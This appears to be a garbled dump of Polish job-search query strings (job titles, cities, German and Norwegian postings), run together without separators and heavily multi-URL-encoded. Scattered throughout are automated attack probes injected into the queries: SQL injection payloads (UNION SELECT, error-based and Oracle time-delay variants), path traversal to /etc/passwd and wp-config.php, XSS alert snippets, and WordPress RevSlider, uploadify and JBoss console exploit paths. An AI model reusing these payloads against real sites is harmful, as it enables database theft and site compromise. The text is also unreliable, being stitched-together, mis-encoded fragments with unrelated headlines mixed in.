warszawa,kontroler%2bjako%c5%9bci%2b%28m/k%29specjalista%2bds.%2bobs%25c5%2582ugi%2bklientapracownik ochrony fizycznej z kwalifikacjąkonsultant ds. umawiania spotka%25252525c5%2525252584p%25252525c5%2525252582atnos ciprzemys%c5%82+%7c+produkcja warszawawykładanie+towaru+dniówka warszawaw+biurze+stowarzyszenie,+fundacja,+organizacjenauczyciel j%c4%99zyk niemiecki/login.action/jmx-console/htmladaptor?action=inspectmbean'a=0pracownik produkcji (m/k) bytommonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0'operator minikoparki niemcymonter konstrukcji/wp-login.php'a=0/07545460.php99999" union select unhex(hex(version())) -- "x"="x'kontroler jako%c5%9bci %28m/k%29górawyk%2525c5%252582adanie+towaru warszawadyrektor zakładuasystent prjektantapraca fizyczna rybnikmonter%252fka+element%2525c3%2525b3w+do+siedze%2525c5%252584+samochodowych niemcypracownik magazynowy niemcymonter norwegiapracownik działu administracjimonter+konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0+and+1%3d1%3cimgopracownik%2bprodukcji%2b-%2bnie%2bwymagamy%2bdo%c5%9bwiadczeniapracownik porz%25252525c4%2525252585dkowy %2525252528m/k%2525252529kierowca kat c union all select 14%252c14%252c14%252c14%252c14%252c14%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527styyhaksi%252525c4%25252599gowo%252525c5%2525259b%252525c4%25252587 %2525257c audyt %2525257c podatkimagazynier %2528m/k%2529 opolepracownik+porz%2525252525c4%252525252585dkowykierowca kat c' union all select null,null,null,null,null,null,null-- phhrpacking+workerbadania i rozw%2525252525c3%2525252525b3jaaaaaaaaprzemys%25c5%2582 %257c produkcja zachodniopomorskiesta%252525c5%252525bc hrkierowca%252525252bw%252525252bwypo%25252525c5%25252525bcyczalni%252525252bsamochodowej%252525252b%2525252528m%252fk%2525252529 niemcykierownik rob%2525c3%2525b3tasystent+projektanta warszawajaworpoznańmonter konstrukcji/wp-login.php%27a%3d0/07545460.php/wp-admin/edit.php%3fpost_type%3dwd_ads_adspraca dla pań i panówinformatyka programowanie helpdesk katowicekonsultant ds. wdro%252525c5%252525bce%252525c5%25252584obs%c5%82uga maszynadministracja%2bbiurowa%25252527a%2525253d0handlowyfinanse%2b%7c%2bbankowo%c3%85%c2%9b%c3%84%c2%87samodzielna ksi%25c4%2599gowakobierzycejunior front-end%27transport %7c spedycja2121121121212.1 tychywarehouse/wp-login.php%2525252527a%252525253d0%2525252527a%252525253d0location%252525253dtychy and 1%252525253d1%2525252527a%252praca%2525252bw%2525252bszpitaluprodukcja%2blek%252525252525c3%252525252525b3wgądkimedycyna %7c %d0%a1%d0%a2%d0%9e%d0%9c%d0%90%d0%a2%d0%9e%d0%9b%d0%9e%d0%93praca+transport+budowaasystent/ka ds. administracji i obsługi klienta ze znajomością języka ruskiegoadministracja%2bhrpielęgniarka wrocławt%252525c5%25252582umacz ukrai%252525c5%25252584skiegopodw%25c3%25b3jna obsada kierowca c%252bekadry+i+p%c5%82acekonsultant+ds.+umawiania+spotka%2525c5%252584pracownik%252bbiurowy%252b1/2%252betatuwarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy%27+and+%27x%27%3d%27ypracownik dzia%c5%82u obs%c5%82ugi klienta warszawamonta%252525c5%252525bc instalacji elektrycznychpracownik+produkcji+spożywczej+(m/k)mechanik%2bsamochodowy niemcymanager sprzeda%c5%bcy gdyniaj%25c4%2599zyk w%25c5%2582oski warszawaelektronik %252528m/k%252529 w zespole reklamacjinowogród bobrzańskiprzedstawiciel+medycznypracownik+sekretariatu szczecinprodukcja+dla++niepełnosprawnych poznańelektryk mistrz wałbrzychin%25c5%25bcynieria+%257c+projektowanie lublintechnolog małopolskieasystent/ka+ds.+administracji+i+obsługi+klienta lublinслесарьmedia %7c sztuka %7c rozrywka-1100 union all select 14,concat(concat('qqzpq','qzkkwdrdwsafqacdekvfmadppjsakxktuambhawj'),'qbbvq'),14,14,14,14,14-- rftwprzemysł+|+produkcja kutnokierowca kat c union all select null%2cnull%2cnull%2cnull%2cnull-- xbyaprzemys%25c5%2582+%257c+produkcjaoperator maszyn szczecinze %252525c5%2525259brednim wykszta%252525c5%25252582ceniem warszawaelektryk %25252528m/k%25252529specjalista ds ubezpiecze%25252525c5%2525252584transport %2525257c spedycja and 1>1 grodzisk mazowieckipracownik+monta%c5%bcu+%28m/k%29 bytomsprzataczka w szkole%27/etc/passwd%25%27%3bselect+dbms_pipe.receive_message%28chr%2878%29%7c%7cchr%28122%29%7c%7cchr%28103%29%7c%7cchr%2897%29%2c5%29+fz orzezceniem katowiceoperator+w%25252525252525c3%25252525252525b3zka+wid%25252525252525c5%2525252525252582owegooperator+koparki płockmonter konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27'a=0hr specialist łódźsap%2babap%2bmmspedytor śląskiein%25c5%25bcynier gdyniaredaktor+treści+marketingowych krakówkierowca+w+wypo%252525252525c5%252525252525bcyczalni+samochodowej+%25252525252528m/k%25252525252529operator%2bprasy%2bkrawedziowejadministracja pa%2525c5%252584stwow warszawamonta%2525c5%2525bc+instalacji+elektrycznych pomorskiemonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0" and "x"="y' and 'x'='ystażysta+w+dziale+rekrutacjilogistyka%2b%252525257c%2bdystrybucjamonter%25252fka+element%2525c3%2525b3w+do+siedze%2525c5%252584+samochodowychmonta%2525c5%2525bc+instalacji+elektrycznychkierowca+w+wypo%2525c5%2525bcyczalni+samochodowej+%252528m/k%252529kierowca kat c union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- lhxikierowca w wypo%25252525252525c5%25252525252525bcyczalni samochodowej %2525252525252528m%252fk%2525252525252529 niemcypracownik szklarni z og%25252525c3%25252525b3rkamipionkiprodukcja+dla++niepełnosprawnychdyrektor ds. bezpiecze%c5%84stwapracownik myjni samochodowej %252528m/k%252529 katowicewarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy%2522+or+%25281%252c2%2529%253d%2528select%252afrom%2528select+ntransport+|+spedycja mazowieckiemonter konstrukcji/wp-login.php<imgonmouseover="alert('mysqlerror')">'a=0tarczynbojszowymagazynier/kalektor niemieckiegoz%2borzezceniem szczecinpomoc+kuchenna,+asystentki,+cukirnik warszawapracownik+fizyczny szczecinspecjalista ds. sprzeda%2525c5%2525bcy produkt%2525c3%2525b3w bankowychsprzedaż | obsługa klienta/branża elektrotechnicznąpracownik%252bprodukcji%252b%25252528m%2fk%25252529operator w%2525252525c3%2525252525b3zk%2525252525c3%2525252525b3w wid%2525252525c5%252525252582owych szczecinjęzyk+włoskidoradca+techniczny+%252528komponenty+maszyn%252529 podkarpackie%d0%ba%d1%80%d0%be%d0%b2%d0%b5%d0%bb%d1%8c%d1%89%d0%b8%d0%baasystent/ka ds. administracji i obsługi klientaelektronik %2528m/k%2529 w zespole reklamacjipraca+pomoc+księgowej poznańsamoch%2525c3%2525b3d s%2525c5%252582u%2525c5%2525bcbowykierowca kat c union all select null%2cnull%2cnull-- zdsqdla studenta wrocławmonter konstrukcji/wp-login.php%27a%3d0/wp-admin/%27a%3d0kierowca c e poznańprodukcja dla niepe%25c5%2582nosprawnychkontrola%25252bjako%25252525252525c5%252525252525259bcispecjalista ds rozlicze%252525252525c5%25252525252584specjalista ds sprzeda%2525c5%2525bcy mieszka%2525c5%252584in%252525c5%252525bcynier+serwisu warszawain%252525c5%252525bcynier+jako%252525c5%2525259bcioperator+w%2525c3%2525b3zka+wid%2525c5%252582owego+%252528m/k%252529pracownik monta%2525c5%2525bcu %252528m/k%252529sprzeda%252525c5%252525bc+%2525257c+obs%252525c5%25252582uga+klienta szczecinautomatyk utrzymania ruchu małopolskiestolarzapraca zdalna/operator wprowadzania danychbadania i rozw%25c3%25b3j/etc/passwd%25%27%2bunion%2ball%2bselect%2bnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--%2bqhytkierowca+%2525252528m%2525252fk%2525252529+%2525252528kat.+c%252525252be%252525252c+hakowce%2525252529praca%2bfizyczna mazowieckiepracownik+montażu+(m/k) siemianowice+śląskieprodukcja nysapraca+fizyczna świętokrzyskietransport%2b%25257c%2bspedycjapomoc+w+tłumaczeniachbielany+wrocławskiejezyk francuski polskasprzeda%c5%bc %7c obs%c5%82uga klienta lublinadministracja+biurowa łódzkiewarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy+and+1%253e1medycyna %7c opieka zdrowotna opolskiespecjalista ds kadr i p%252525c5%25252582actransport+%7c+spedycja%22+and+%22x%22%3d%22x'a=0specjalista%2bds.%2bcz%c4%99%c5%9bci%2bzamiennychw%25c3%25b3zki wid%25c5%2582oweit sta%c5%bcpraca+na+produkcjiserwis spszatajacyasystent+projektanta+siecipromotor%2bmarkispec+ds+zakupowmonter konstrukcji/wp-login.php%25252525252527a%2525252525253d0/uploadify/uploadify.php%2525252525253ffolder%2525252525253dspecjalista+ds+ubezpiecze%2525c5%252584english warszawaoławaoperator procesu wtrysku sosnowiecpraca%252bz%252bzakwaterowaniem polskakontrola jako%25252525252525c5%252525252525259bcilkw+driver+cvpracownik+myjni+samochodowej+%2528m/k%2529manager+%c5%82a%c5%84cucha+dostaw warszawaadministracja pa%c5%84stwow warszawarekrutacja pracownik%2525c3%2525b3wmonter+konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0"+and+"x"="y'cieśla+szalunkowypracownik+magazynowy+(m/k) katowicesprzataczka+w+szkole%22+and+%22x%22%3d%22xtokarzpracownik szklarni z og%25c3%25b3rkami holandiamonter konstrukcji/wp-login.php%27a%3d0/07545460.php and 1%3d1praca+z+zakwaterowaniem polskaobsługa klienta warszawamonter rurociagow norwegia-1260 union all select 14%2c14%2c14%2c14%2c14%2cconcat%28concat%28%27qqzpq%27%2c%27gacbylpufr%27%29%2c%27qbbvq%27%29%2c14-- kpixoperator w%252525c3%252525b3zkaspecjalista%2bds.%2bjako%252525252525c5%2525252525259bcikierowca %252528m%252fk%252529 %252528kat. c e%25252c hakowce%252529praca+biurowa,magazynier chrzanówbezp%25c5%2582atny transportpraca+zdalnkierrowca+kat+bopiekunka+osób+starszychводитель+категории+bmonter konstrukcji/wp-login.php'a=0'a=0kierowca kat c union all select null,null,null,null,null,null,null,null-- lmmvmonter konstrukcji/wp-login.php%2527a%253d0/07545460.php%2527 and %2527x%2527%253d%2527ykurs+na+wózek+widłowychrzanówhr%2c%2bkadryjunior+marketingspedytor mi%2525c4%252599dzynarodowybudownictwo%252b%2525252525257c%252bgeodezjaspecjalista warszawapracownik produkcji %2528m%252fk%2529transport %25257c spedycja szczecinm%2525c5%252582odszykierownik+budowy krakówkierowca kat b c1111111111111' union select char(45,120,49,45,81,45)-- warszawat%c5%82umacz+angielskiego warszawaoperator w%252525252525c3%252525252525b3zka wid%252525252525c5%25252525252582owegopracownik%2bdzia%2525c5%252582u%2badministracjijunior+front-end%252527 warszawapraca pomoc ksi%c4%99gowej warszawaspecjalista ds kar i p%2525252525c5%252525252582ac/etc/passwd%25%27%2border%2bby%2b1--%2blxhmpracownik%2bdzia%c5%82u%2bhrspecjalista ds. obs%25c5%2582ugi klienta-j. niemiecki warszawaoprator wózka dolnośląskiepraca%2bfizycznakucharzkierowca++kat+c+order+by+1--+kfgtmontaż filmówkierowca+w+wypo%252525c5%252525bcyczalni+samochodowej+%25252528m%252fk%25252529kierowca+w+wypożyczalni+samochodowej+(m/k)konsultant+infolinii+szpitalnejbez%20j%2525252525c4%252525252599zykaoperator+w%2525c3%2525b3zkapraca%2bniemcy%2bpraca%2bfizyczna niemcytester manualnymonter laminatu niemcyspecjalista ds. wdrożenia platformyadministracja biurowa koszalinpraca+fizyczna kujawsko-pomorskiekierowca%2525252bw%2525252bwypo%25252525c5%25252525bcyczalni%2525252bsamochodowej%2525252b%2525252528m%252fk%2525252529specjalista+ds.+kadr+i+rekrutacji+%2528m/k%2529kierowca%2b%28m/k%29%2b%28kat.%2bc%2be%2c%2bhakowce%29prabutypracownik+księgowości śląskiemonter%25252fka+element%25252525c3%25252525b3w+do+siedze%25252525c5%2525252584+samochodowych niemcyspecjalista+ds.+płac+i+kadr mazowieckieМеханик швейных машинin%2525c5%2525bcynier+serwisuduszniki zdrójin%25c5%25bcynier+zak%25c5%2582aduzamówieńmaszynista offsetowy polskapracownik%2bsklepu%2binternetowegoprodukcja dla niepełnosprawnych%';select dbms_pipe.receive_message(chr(106)||chr(110)||chr(97)||chr(111),5) from dual--kierowca+w+wypo%252525252525c5%252525252525bcyczalni+samochodowej+%25252525252528m%25252fk%25252525252529pomeranian voivodeshippraca%2525252bdla%2525252bstudentaspecjalista%2bds%2brozlicze%2525252525c5%252525252584badaniapajęcznokierowca kat c union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- vyoehuman resources | kadry健身超模身材火辣+曲线让人喷血_纵览全球_战略网i'd+happily+take+a+1-point+win!+|+sport24manager+łańcucha+dostaw warszawapracownik+produkcyjny+%252528m/k%252529 gliwicepracownik ochrony dobre miastospecjalista%2bds.%2bp%25c5%2582ac%2bi%2bkadr/etc/passwd%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--+xvcwod%2bzarazprodukcja%2bdla%2b%2bniepe%c5%82nosprawnych%2b1/2%2betatupo%c5%82%c4%85czenia%2bprzychodz%c4%85cepraca fizyczna katowiceprodukcja lek%252525252525c3%252525252525b3wkonsalnetkierowca%2b%2bkat%2bc%2bunion%2ball%2bselect%2b14%2c14%2c14%2cconcat%28concat%28%27qqzpq%27%2c%27xoirqgorcl%27%29%2c%27qbbvq%27%medycyna %252525257c opieka zdrowotnaobs%c5%82uga biurowamonter%25252fka+element%2525252525c3%2525252525b3w+do+siedze%2525252525c5%252525252584+samochodowych niemcypraca+fizyczna+w+rolnictwie poznańpracownik gospodarczy z%c5%82ota r%c4%85czkamłodszy warszawaj%2525c4%252599zyka%2bhiszpa%2525c5%252584skiegoadministracja%2b%2bpa%25c5%2584stwowa%27a%3d0praca+bez+znajomo%2525252525c5%25252525259bci+j%2525252525c4%252525252599zykaspecjalista d/s importu -eksportu %252c obs%25c5%2582uga klienta %252c ar %252c konsultant z j%25c4%2599zykiem francuskim %252cłódzkieprzemysł | produkcja częstochowapomoc+ksi%c4%99gowakierowca grudziądzkontrola%2bjako%252525252525c5%2525252525259bcipraca emeryt tarnowskie górytechnik+mechanikmontaż+instalacji+elektrycznych pomorskiepracownik+monitoringu+-+obiekt+handlowy rybnikbezp%2525c5%252582atny transportsprzataczka biurowa poznańtechnolo+konstrukcji/wp-login.php%27a%3d0j%25c4%2599zyk%2bfrancuskivoice%d0%b2%d0%be%d0%b4%d0%b8%d1%82%d0%b5%d0%bb%d1%8cin%252525c5%252525bcynier+%252525c5%2525259brodowiska/etc/passwd'+union+all+select+null,null,null--+enwutechnik%2bmechanikdoradca%2bds.%2bkredyt%252525c3%252525b3wmarketing Łódźobs%25c5%2582uga klientakierowca+c+e poznańpraca biurowa z obs%c5%82ug%c4%85 klientaprojectpracownik obs%c5%82gi lotniskamarketing | reklama | pr śląskiepraca%252bpomoc%252bksi%25252525c4%2525252599gowejzbrojarz belgiaprocess+engineersprzedaż+|+obsługa+klienta gorzów+wielkopolskidla+obcokrajowc%c3%b3wbudownictwo%2b%25257c%2bgeodezja francjatechnik elektronik wrocławopiekunka niemcypracownik%2bdzia%252525c5%25252582u%2bhrkierowca%252bw%252bwypo%2525c5%2525bcyczalni%252bsamochodowej%252b%252528m/k%252529 niemcypraca%252525252bfizyczna%252525252bw%252525252brolnictwie niemcypracownik+obszaru+produkcji+%2528m/k%2529 czechowice-dziedziceosoba sprz%25c4%2585taj%25c4%2585cakierownik+regionalnykonsultant+ds.+obs%25c5%2582ugi+klientaelektryk,elektromonterwarehouse/wp-login.php%252527a%25253d0%252527a%25253d0 and 1%253d1belgia../../../../../../etc/passwdreception ,agient kklenta z językiem angielskim mazowieckie.piwnicznapraca+pomoc+ksi%2525c4%252599gowej wielkopolskiemonter+płyt+gkpracownik porz%2525252525c4%252525252585dkowypracownik%2bbiurowy%2bna%2bmagazynkierowca kat c' union all select null,null,null-- lyufdoradca%2btechniczny%2b%2525252528komponenty%2bmaszyn%2525252529transport %257c spedycja%2527a%253d0%2527a%253d0monter+konstrukcji/wp-login.php%2527a%253d0%2527a%253d0produkcjapraca++fizyczna+bez+j%2525c4%252599zyka niemcyosoba%2bsprz%2525c4%252585taj%2525c4%252585caasystent/ka ds. administracji i obsługi klienta wrocławmonter/ka element%25252525c3%25252525b3w do siedze%25252525c5%2525252584 samochodowychreferent+ds.+funduszy+europejskich+%252528m/k%252529kierowca w wypo%25252525252525c5%25252525252525bcyczalni samochodowej %2525252525252528m%2525252fk%2525252525252529 niemcyprodukcja+dla++niepełnosprawnych'+union+all+select+null,null,null,null,null,null#pracownik%2bpomocy%2bspo%c5%82ecznejkuyavian-pomeranian voivodeshipkierowca %28kat. c%2be%2c hakowce%29warehouse/wp-login.php%252527a%25253d0%252527a%25253d0%252527a%25253d0magazynier %2c budowlanka/etc/passwd union all select null,null-- lzdlsta%2525c5%2525bcysta w dziale rekrutacjioffice assistantod+zaraz lubelskiekierowca w wypo%25c5%25bcyczalni samochodowej %2528m/k%2529 niemcyj%252525c4%25252599zyk francuskikierowca kat c%';select dbms_pipe.receive_message(chr(103)||chr(80)||chr(90)||chr(76),5) from dual--Śrempracownik produkcji-bez-jezyka-niemieckiego warszawamonter konstrukcji/wp-login.php%2527a%253d0/wp-content/plugins/revslider/temp/update_extract/57758779.phpoperator wózka widlowego drezdenkodyrektor ds. bezpieczeństwakierowca++kat+c%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull--+gkmemonter+p%25c5%2582ytlektor angielskiegomonter konstrukcji/wp-login.php%27pracownik monta%c5%bcufrancuski rekrutacjapracownik produkcji dolnośląskiemedia+|+sztuka+|+rozrywka warszawat%2525c5%252582umacz angielskiegomagazynier wielkopolskieinformatyka+programowanie+helpdesk katowicepraca z zakwaterowaniem polskawarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy%2522+and+%2522x%2522%253d%2522ykontroler+jako%c5%9bci+%28m/k%29 warszawaochrona+dla+zwierz%2525c4%252585tsekretarka ze znajomością j. angielskiegopraca+pomoc+ksi%25252525c4%2525252599gowepracownik dzia%25c5%2582u hrpraca%2525252525252bbez%2525252525252bjezyka niemcymonter konstrukcji/wp-login.php%2527a%253d0/wp-admin/mechanik samochodowy kierowca warszawabudownictwo%252525252b%2525252525257c%252525252bgeodezja francjapracownik szklarni z r%25c3%25b3%25c5%25bcamikierownik region%c3%b3wkontroler jako%252525252525c5%2525252525259bcipracownik produkcji p%2525252525c5%252525252582o%2525252525c5%252525252584sklider w dziale art. przemys%252525c5%25252582owychmagazynier+%2528m/k%2529 warszawakontrola jako%25c5%259bci polskapracownik%2bprodukcji%2b%25e2%2580%2593%2bnie%2bwymagamy%2bdo%25c5%259bwiadczeniarecepcjonista+w+hotelu warszawapraca+dla+par holandianowe miasto nad pilicąprodukcja dla niepełnosprawnych union all select null,null,null,null,null#monter pod%25c5%2582%25c3%25b3gpraca%2bpomoc%2bksi%25c4%2599goweprzemysł+|+produkcja bytompracownik+produkcji+%252528m/k%252529doradca+medycznykierowca kat c%' union all select null,null,null,null,null,null,null,null,null-- gylzopiekunka+do+dziecka wrocławpraca zakwterowaniemspecjalista%2bd/s%2bimportu%2b-eksportu%2b%252c%2bobs%25c5%2582uga%2bklienta%2b%252c%2bar%2b%252c%2bkonsultant%2bz%2bj%25c4%2599specjalista+ds+kadr+i+płac podkarpackieobsługa warszawain%252525c5%252525bcynier serwisuprzepalacz praca fizycznapraca%25252bna%25252bbudowie%25252bwarszawatechnik elektryk (m/k) śląskie/etc/passwd wrocławkierowca+kat.+ceasystent ds. księgowosci poznańbudownictwo%2b%257cmonter+konstrukcji/wp-login.php%253script%253ealert%28/mysqlerror/%29%253c/script%253esekretarka+ze+znajomością+j.+angielskiego krakówwodzisław Śląskimonter+konstrukcji/wp-login.php%2525252527a%252525253d0/wp-admin/admin-ajax.phpsport | rekreacja warszawamonter+konstrukcji/wp-login.php%25252527a%2525253d0/07545460.php+and+1%2525253d1%25252527a%2525253d0bez doświadczenia poznańnauczyciel j%252525c4%25252599zyk niemiecki/login.actionstudio assistantprzedstawiciel handlowy marki premium szczecinlublin voivodeshippraca dla moll wrocławpracownik+produkcilider+w+dziale+produkt%25252525c3%25252525b3w+du%25252525c5%25252525bcej+konsumpcjikey+account+manager mazowieckie%d0%be%d0%bf%d0%b5%d1%80%d0%b0%d1%82%d0%be%d1%80 %d0%ba%d0%be%d0%bd%d0%b2%d0%b5%d0%b9%d0%b5%d1%80%d0%bd%d0%be%d0%b9 %d0%bb%d0%b8praca%2bbez%2bznajomo%25252525252525c5%252525252525259bci%2bj%25252525252525c4%2525252525252599zyka niemcypraca%2bpomocpracownik produkcji śląskiesprz%2525c4%252585taczka w szkolepomocnik w agroturystyceasystent dzia%252525c5%25252582u zakup%252525c3%252525b3wkontrola+jako%25c5%259bci warszawam%252525c5%25252582odszy ksi%252525c4%25252599gowybez%2bj%2525c4%252599zykam%2525c5%252582odszy warszawanie pe%25c5%2582ny etatbadania%25252bi%25252brozw%25252525c3%25252525b3jmonter+konstrukcji/wp-login.php%2525252527a%252525253d0/07545460.php%2525252522+and+%2525252522x%2525252522%252525253d%252525252pracownik+powierzchni+sprzeda%2525252525c5%2525252525bcy/kasjer(select 7866 from(select count(*),concat(0x71786a6b71,(select (elt(7866=7866,1))),0x71766b7871,floor(rand(0)*2))x from informatimonter konstrukcji/wp-login.php'a=0/07545460.php/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.phpmonter%2fka element%252525c3%252525b3w do siedze%252525c5%25252584 samochodowychmonta%c5%bcysta meblimonta%25c5%25bcysta+mebliŻyrardówmechanicznejdoradca+techniczny+%28komponenty+maszyn%29 podkarpackiepraca%2bw%2bbiurze%2bz%2bj%c4%99zykiem%2bukrainskimoperator w%c3%b3zka wid%c5%82owego %e2%80%93 2 zmiany%2c bez do%c5%9bwiadczeniamonter/ka+element%c3%b3w+do+siedze%c5%84+samochodowychgłówna+księgowaasystent klienta%252525252c konsultantbudownictwo+%25257c+geodezja francjakierowca+w+wypo%25252525c5%25252525bcyczalni+samochodowej+%2525252528m%2fk%2525252529 niemcycross borderpraca z orzeczeniem o niepełnosprawności warszawaswarzędzpraca+niemcy+praca+fizyczna niemcymonter+konstrukcji/xmlrpc.php%252527a%25253d0%252527a%25253d0monter+konstrukcji/wp-login.php'a=0/wp-content/plugins/revslider/temp/update_extract/57758779.phpproject+controllerin%2525c5%2525bcynier+elektronik+%252528m/k%252529radca pkierowca+w+wypo%2525252525c5%2525252525bcyczalni+samochodowej+%252525252528m%25252fk%252525252529 niemcypraca+fizyczna staroźrebymonter konstrukcji%2fwp-login.php%2527a%253d0%2f07545460.php and 1%253d1%2527a%253d0praca fizyczna warszaeapraca%2bfizyczna niemcypraca ca%25c5%2582y etatin%25c5%25bcynier+procesuksięgowa lublinpomoc na magazynie wadowicemłodszy księgowy krakówkadr,specjalista,hrpomocnik+%c5%9bmiciarza niemcypomocnik kierowcyoperator prasy krawedziowejtransport+%2525252525257c+spedycja%25252525252527a%2525252525253d0%25252525252527a%2525252525253d0kierowca kat b c1111111111111 union select char(45,120,49,45,81,45) --produkcja+dla++niepełnosprawnych+union+all+select+null,null,null,null,null,null,null#transport+%257c+spedycja%27a%3d0pracownik+produkcji+%2528m%2fk%2529pracownik+administracyjna poznańtechnik elektryk %25252525252528m/k%25252525252529 polskapraca+dla+pań+i+panówbudowlanepraca bez znajomo%2525c5%25259bci j%2525c4%252599zyka niemcyin%2525252525c5%2525252525bcynieria%25252b%25252525257c%25252bprojektowaniewpisywanie+danych+do+bazypracownik+produkcji śląskiebudownictwo%2525252b%2525257c%2525252bgeodezja francjapracownik+bufetu wrocławmanager wrocławtransport%2b%7c%2bspedycja%27a%3d0kadry poznańhr specialistmonter konstrukcji/wp-login.php%27a%3d0/07545460.php%27 or %281%2c2%29%3kierowca%2525252bbes%2525252bznajosci%2525252bjenzykakontrola%2525252bjako%25252525c5%252525259bci mazowieckiedeliveryadminstracjia+biurowa warszawamonter konstrukcji/wp-login.php<inputtype="image"src="javascript:alert('mysqlerror');"> and 1>1lkw driverbodzanówwałbrzychhuman resources %257c kadry wielkopolskiespecjalista%2bds.%2bobs%2525252525c5%252525252582ugi%2bklientaspecjalista ds. planowania produkcji ŁÓdŹpracownik+sklepu+odzie%252525c5%252525bcowego+%25252528m/k%25252529/etc/passwd+union+all+select+null,null,null,null,null,null,null,null--+wjcipraca%2bbez%2bznajomo%2525252525252525c5%25252525252525259bci%2bj%2525252525252525c4%252525252525252599zyka niemcymonter konstrukcji/wp-login.php%252527a%25253d0/07545460.php%252522 or %2525281%25252c2%252529%25253d%252528select%25252afrom%25tutor+of+englishkontrola%252bjako%25c5%259bci polskaotcf wolbromukładanie+towarupracownik dzia%2525252525c5%252525252582u hrcięcinakierowca+%28m%2fk%29+%28kat.+c+e%2c+hakowce%29monter konstrukcji/wp-login.php%25252527a%2525253d0/uploadify/uploadify.php%2525253ffolder%2525253dnauczyciel język niemiecki dolnośląskiekierowca++kat+c+union+all+select+null,null,null,concat(concat('qqzpq','iqipzpquba'),'qbbvq'),null,null,null--+iqnhpraca%2bw%2bmagazynie%2bniemcy%2bbez%2bznajomo%2525c5%25259bci%2bj%2525c4%252599zykastażysta w dziale rekrutacjisortowanie warzywdzia%c5%82 obs%c5%82ugi klientamonta%2525c5%2525bcysta element%2525c3%2525b3w elektromagnetycznychinżynier wrocławpraca%252bz%252bzakwaterowaniem niemcyspecjalista doperator wózka widłowego (m/k) dolnośląskie%d0%a1%d1%82%d1%80%d0%be%d0%b8%d1%82%d0%b5%d0%bb%d1%8c%d1%81%d1%82%d0%b2%d0%bein%c5%bcynier+%c5%9brodowiskaspecjalista+ds.+kadr+i+p%2525c5%252582ac/etc/passwd union all select null,null,null,null,null,null,null-- trfrmonter+oczyszczalnioperator obrabiarek cncmarketing %257c reklama %257c prneklapracownik produkcji praca od zaraz niepołomiceoperator w%25c3%25b3zka wid%25c5%2582owegoprzemysł | produkcja tychypracownik magazynowy - atrakcyjna stawka i bezpłatny dojazdpraca%25252bw%25252bszpitalupracownik+biurowy pomorskiespecjalista ds. administracji %28m/k%29pracownik%2bprodukcji%2b-%2bpraca%2bod%2bzaraz20word pressbudownictwo %252525257c geodezja pomocnikpani do towarzysrwaspecjalista ds. kadr i p%2525c5%252582ac %252528m/k%252529warehouse/wp-login.php%27a%3d0%27a%3d0" and "x"="yreferent+ds+kadr poznańbudownictwo%2525252525252b%252525252525257c%2525252525252bgeodezja francjapłońskspecjalista+d/s+importu+-eksportu+%25252c+obs%2525c5%252582uga+klienta+%25252c+ar+%25252c+konsultant+z+j%2525c4%252599zykiem+frasprzedaż | obsługa klienta pomorskieprzemys%252525c5%25252582+%2525257c+produkcja szczecinmonter konstrukcji/wp-login.php%2527a%253d0/wp-admin/admin-ajax.php%253faction%253drevslider_show_image%2527a%253d0%2527a%253d0%sortowanie warzyw Łódźkierownik uslug porzadkowychpakowacz wadowicedyrektor marketingucieśla dekarzmedia %2525257c sztuka %2525257c rozrywkasprzeda%25c5%25bc+%257c+obs%25c5%2582uga+klienta rybniksupply+chain+managementkonstruktor+odziezyasystent+ds.+ksi%c4%99gowosciprodukcja dla niepełnosprawnych union all select null,null,null,null,null,null,null,null-- sdbwpracownik biurowy zielona góramonter+kad%25c5%2582ub%25c3%25b3wkonsultant ds. obs%2525c5%252582ug klientaw+języku+ukraińskim krakówkontroler jako%25c5%259bci sosnowieckierowca+%2528m%2fk%2529+%2528kat.+c+e%252c+hakowce%2529 niemcynauczyciel+j%c4%99zyk+niemiecki/login.action/invoker/jmxinvokerservletksi%2525c4%252599gowo%2525c5%25259b%2525c4%252587+%25257c+audyt+%25257c+podatkipraca+bez+znajomo%2525252525c5%25252525259bci+j%2525252525c4%252525252599zyka niemcyz%2bj%25252525c4%2525252599zykiem%2bw%25252525c5%2525252582oskimkadra zarządzającaobsługa+klienta warszawapraca+biurmonter konstrukcji/wp-login.php'a=0/07545460.php99999" union select unhex(hex(version())) -- "x"="xszycie w domumonter konstrukcji/wp-login.php%2525252527a%252525253d0/wp-admin/admin-ajax.php%252525253faction%252525253drevslider_show_imagetechnolog przetw%25c3%25b3rstwa tworzywwłodawakierowca mi%c4%99dzynarodowymonter konstrukcji/wp-login.php%2527a%253d0/license.phpmiędzychódbudownictwo%252b%252525252525257c%252bgeodezja francjapraca fizyczna bez j%2525c4%252599zyspecjalista+ds.+kadr+i+p%25252525c5%2525252582ac+%2525252528m/k%2525252529 wielkopolskieostrów+mazowieckapraca+z+orzeczeniem+o+niepełnosprawności+kierowca+katbudownictwo+%2525252525257c+geodezjapraca biur warszawakierowca++kat+c'+union+all+select+null,null,null--+lyufpodwykonawca p%252525c5%25252582ytky g%252525c5%25252582adzie malowaniemonter konstrukcji/wp-login.php%2527a%253d0/wp-adminenergetyka | elektronikajunior front-end'pakowanie nieletni/etc/passwd union all select null,null,null,null,null,null-- cnpzpracownik+produkcyjno+-+magazynowy gryfinomonter konstrukcji/wp...//wp-admin/admin-ajax.php?action=revolution-slider_show_imageasystent/ka ds. księgowosciit 